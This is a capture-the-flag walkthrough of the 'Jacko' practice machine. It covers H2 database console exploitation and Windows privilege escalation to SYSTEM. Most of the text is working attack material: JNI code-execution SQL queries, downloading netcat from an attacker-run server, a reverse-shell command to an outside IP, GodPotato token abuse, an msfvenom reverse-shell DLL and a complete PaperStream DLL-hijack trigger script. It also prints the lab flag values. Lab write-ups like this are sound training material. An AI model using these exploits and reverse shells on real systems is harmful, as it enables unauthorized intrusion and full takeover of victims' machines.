Jacko
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.137.66
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-11 21:04 EST
Nmap scan report for 192.168.137.66
Host is up, received echo-reply ttl 125 (0.26s latency).
Scanned at 2025-11-11 21:04:04 EST for 208s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8082/tcp open http syn-ack ttl 125 H2 database http console
| http-methods:
|_ Supported Methods: GET POST
|_http-title: H2 Console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
9092/tcp open XmlIpcRegSvc? syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
<snipped>
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>HTTP (80):
If we opened that with firefox:
Only a static web page with html endpoints indicating this is an H2 database.
HTTP (8082):
Lets browse to that port:
We can see here is the dbms itself, and it is misconfigured that is why we can view it.
If we clicked on connect:
We will be able to connect successfully.
From here we can do various things, read files, write files, execute system commands depending on some conditions.
Read win.ini file with read_file function:
Now I searched for ways to execute system commands and found many blogs talking about creating an alias of the exec method then execute commands, but non of those worked for me:
It throws an error talking about it can not run the java compiler.
I searched with searchsploit again:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ searchsploit h2 database
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
H2 Database - 'Alias' Arbitrary Code Execution | java/local/44422.py
H2 Database 1.4.196 - Remote Code Execution | java/webapps/45506.py
H2 Database 1.4.197 - Information Disclosure | linux/webapps/45105.py
H2 Database 1.4.199 - JNI Code Execution | java/local/49384.txt
Oracle Database 10 g - XML DB xdb.xdb_pitrig_pkg Package PITRIG_TRUNCATE Function Overflow | multiple/remote/31010.sql
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No ResultsThe first 2 have the same queries I mentioned above.
Exploitation:
Lets mirror the fourth one:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ searchsploit -m java/local/49384.txt
Exploit: H2 Database 1.4.199 - JNI Code Execution
URL: https://www.exploit-db.com/exploits/49384
Path: /usr/share/exploitdb/exploits/java/local/49384.txt
Codes: N/A
Verified: True
File Type: ASCII text, with very long lines (64895)
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Jacko/49384.txtRead it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ cat 49384.txt
# Exploit Title: H2 Database 1.4.199 - JNI Code Execution
# Exploit Author: 1F98D
# Original Author: Markus Wulftange
# Date: 28 April 2020
# Vendor Hompage: https://www.h2database.com/
# Tested on: Windows 10 x64, Java 1.8, H2 1.4.199
# References: https://codewhitesec.blogspot.com/2019/08/exploit-h2-database-native-libraries-jni.html
# H2 allows users to gain code execution by compiling and running Java code
# however this requires the Java Compiler to be available on the machine running H2.
# This exploit utilises the Java Native Interface to load a a Java class without
# needing to use the Java Compiler
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),<nsipped>,'"'), 'ISO-8859-1', '', '', '', '', '');
-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');Those queries as mentioned will write native library, then load it, and finally we can execute system commands.
Lets do that:
Load the library:
Try to execute whoami:
Here we have command execution.
Now lets get a reverse shell, but first I need to figure out what ports it can reach:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.137.66 - - [11/Nov/2025 21:43:47] code 404, message File not found
192.168.137.66 - - [11/Nov/2025 21:43:47] "GET / HTTP/1.1" 404 -
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
192.168.137.66 - - [11/Nov/2025 21:43:58] code 404, message File not found
192.168.137.66 - - [11/Nov/2025 21:43:58] "GET / HTTP/1.1" 404 -It seems to be it can reach not only the open ports that we discovered with nmap.
Copy nc.exe to our directory and run a python3 web server again to host the binary:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...Upload it to the target:
We got an error, but if we went back to our web server:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.137.66 - - [11/Nov/2025 21:48:24] "GET /nc64.exe HTTP/1.1" 200 -Now using that binary get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 49970
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>C:\Program Files (x86)\H2\service>whoami /all
whoami /all
'whoami' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files (x86)\H2\service>powershell
powershell
'powershell' is not recognized as an internal or external command,
operable program or batch file.I will add more paths to the path variable so we can use tools such as the one I used above:
C:\Program Files (x86)\H2\service>set PATH=C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;%PATH%
C:\Program Files (x86)\H2\service>cd \Users
C:\Users>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users> whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
jacko\tony S-1-5-21-3761179474-3535027177-3462755717-1001
<snipped>
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledThat is the path I followed to elevate my privileges to system by upload godpotato as I did in previous boxes:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...PS C:\Windows\Tasks> curl http://192.168.45.238/GodPotato-NET4.exe -o GodPotato-NET4.exe
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/11/2025 6:57 PM 57344 GodPotato-NET4.exe
-a---- 11/11/2025 6:48 PM 45272 nc.exePS C:\Windows\Tasks> .\GodPotato-NET4.exe -cmd "C:\Windows\Tasks\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.238 443"
[*] CombaseModule: 0x140731985952768
[*] DispatchTable: 0x140731988295264
[*] UseProtseqFunction: 0x140731987662864
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\15d86cff-e221-4cf5-baf8-3a7020297285\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0bd8-ffff-2605-ea55deb5a91f
[*] DCOM obj OXID: 0x2b8f8d96cb49424d
[*] DCOM obj OID: 0x6c0c63dc4e4e6abb
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 788 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4084┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 50009
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>set username
USERNAME=JACKO$
C:\Windows\system32>set computername
COMPUTERNAME=JACKOWe are the machine account which is system.
After I finished the box, I found that there is another path to elevate our privileges.
Post-Exploitation:
See what programs are installed on our target:
PS C:\Windows\Tasks> Get-Package
Get-Package
Name Version Source ProviderName
---- ------- ------ ------------
H2 Programs
Microsoft OneDrive 19.232.1124.0012 Programs
Scanner Central Admin Agent 1.04.0026.23 Programs
Software Operation Panel Programs
Software Operation Panel 4.5.1024 msi
Microsoft Visual C++ 2017 R... 14.12.25810.0 Programs
Microsoft Visual C++ 2017 R... 14.12.25810.0 Programs
VMware Tools 10.3.10.12406962 C:\Program Files\VMware\VMwar... msi
Microsoft Visual C++ 2017 x... 14.12.25810 msi
Java 8 Update 251 (64-bit) 8.0.2510.8 C:\Program Files\Java\jre1.8.... msi
Microsoft Visual C++ 2017 x... 14.12.25810 msi
Scanner Central Admin Agent... 1.4.26.23 msi
Microsoft Visual C++ 2017 x... 14.12.25810 msi
PaperStream IP (TWAIN) 1.42.6 msi
Microsoft Visual C++ 2017 x... 14.12.25810 msi
Java Auto Updater 2.8.251.8 msiThe vulnerable program is paperstream.
We can get its version by reading the readme file under twain folder:
PS C:\> dir "Program Files (x86)"
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/27/2020 8:59 PM Common Files
d----- 4/27/2020 9:01 PM fiScanner
d----- 4/27/2020 8:59 PM H2
d----- 5/3/2022 6:22 PM Internet Explorer
d----- 3/18/2019 9:52 PM Microsoft.NET
d----- 4/27/2020 9:01 PM PaperStream IP
d----- 3/18/2019 11:20 PM Windows Defender
d----- 3/18/2019 9:52 PM Windows Mail
d----- 4/24/2020 9:50 AM Windows Media Player
d----- 3/18/2019 11:23 PM Windows Multimedia Platform
d----- 3/18/2019 10:02 PM Windows NT
d----- 3/18/2019 11:23 PM Windows Photo Viewer
d----- 3/18/2019 11:23 PM Windows Portable Devices
d----- 3/18/2019 9:52 PM WindowsPowerShellPS C:\> dir "Program Files (x86)\PaperStream IP"
Directory: C:\Program Files (x86)\PaperStream IP
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/27/2020 9:01 PM CommonCOM
d----- 4/27/2020 9:01 PM DemoMode
d----- 4/27/2020 9:01 PM FTGPTEDT
d----- 4/27/2020 9:01 PM PatchCode
d----- 4/27/2020 9:01 PM TWAIN
-a---- 5/22/2014 8:02 PM 72 SupportPageenu.url
PS C:\> dir "Program Files (x86)\PaperStream IP\TWAIN"
Directory: C:\Program Files (x86)\PaperStream IP\TWAIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/27/2020 9:01 PM Profile
-a---- 1/28/2016 10:22 AM 11658 Licenseenu.rtf
------ 7/11/2016 6:32 PM 3241739 PSIP0401.chm
------ 7/7/2016 3:40 AM 3315469 PSIP0404.chm
------ 7/6/2016 10:41 PM 3479268 PSIP0407.chm
------ 7/4/2016 11:51 PM 3544174 PSIP0409.chm
------ 7/12/2016 12:59 AM 3449511 PSIP040A.chm
------ 7/7/2016 1:13 AM 3424734 PSIP040C.chm
------ 7/6/2016 4:55 PM 3412543 PSIP0410.chm
------ 6/21/2016 9:13 PM 3868867 PSIP0411.chm
------ 7/5/2016 11:21 PM 3177961 PSIP0412.chm
------ 7/12/2016 5:21 PM 3406701 PSIP0416.chm
------ 7/7/2016 2:19 AM 3396546 PSIP0419.chm
------ 7/6/2016 11:21 PM 3394699 PSIP041F.chm
-a---- 7/4/2016 2:00 PM 17990 readmeenu.rtfPS C:\> cat "Program Files (x86)\PaperStream IP\TWAIN\readmeenu.rtf"
cat "Program Files (x86)\PaperStream IP\TWAIN\readmeenu.rtf"
{\rtf1\ansi\ansicpg932\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fnil\fcharset0 Microsoft Sans Serif;}{\f1\fswiss\fprq2\fcharset0 Microsoft Sans Serif;}}
{\colortbl ;\red0\green0\blue0;}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\nowidctlpar\sl276\slmult1\f0\fs18 ---------------------------------------------------------------------------------
------------------------\par
fi Series\par
PaperStream IP driver 1.42\par
README file\par
---------------------------------------------------------------------------------------------------------\par
Copyright PFU LIMITED 2013-2016\par
\par
\par
This file includes important notes on this product and also the additional information not included in the manuals.\par
\par
---------------------------------------------------------------------------------------------------------\par
<snipped>Search for public exploits for that specific version:
It is vulnerable to dll hijacking.
Lets generate teh dll file with msfvenom:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.238 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dllAlso copy the powershell script and paste it to a file to transfer it to the target machine to trigger the exploitation:
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
if ((Test-Path $PayloadFile) -eq $false) {
Write-Host "$PayloadFile not found, did you forget to upload it?"
Exit 1
}
# Find Writable Location
$WritableDirectory = $null
$Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path
$Path -Split ";" | % {
try {
[IO.File]::OpenWrite("$_\x.txt").close()
Remove-Item "$_\x.txt"
$WritableDirectory = $_
} catch {}
}
if ($WritableDirectory -eq $null) {
Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable"
Exit 1
}
Write-Host "Writable location found, copying payload to $WritableDirectory"
Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll"
Write-Host "Payload copied, triggering..."
$client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
$reader = $null
$writer = $null
try {
$client.Connect()
$reader = New-Object System.IO.StreamReader($client)
$writer = New-Object System.IO.StreamWriter($client)
$writer.AutoFlush = $true
$writer.Write("ChangeUninstallString")
$reader.ReadLine()
} finally {
$client.Dispose()
}
Write-Host "Payload triggered"
Upload both the dll file, and the script:
PS C:\> curl http://192.168.45.238/shell.dll -o "C:\Windows\Temp\UninOldIS.dll"
PS C:\> dir "C:\Windows\Temp\UninOldIS.dll"
Directory: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/11/2025 7:30 PM 9216 UninOldIS.dll
PS C:\> cd \Windows\Tasks
PS C:\Windows\Tasks> curl http://192.168.45.238/exploit.ps1 -o exploit.ps1
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/11/2025 7:31 PM 1412 exploit.ps1
-a---- 11/11/2025 7:27 PM 45272 nc.exeAs shown in the script our dll file should be placed under windows\temp folder.
Before we launch the exploit I will start a nc listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...Run it:
PS C:\Windows\Tasks> .\exploit.ps1
.\exploit.ps1
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...
Payload triggeredAnd we escalated our privileges to system:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 49791
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\systemGet the flags:
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
8fc9d562b60b3040bf3d2309c796258a
C:\Windows\system32>type C:\Users\tony\Desktop\local.txt
7e1df7f9b4eabde99ccdd51364aaf40cLast updated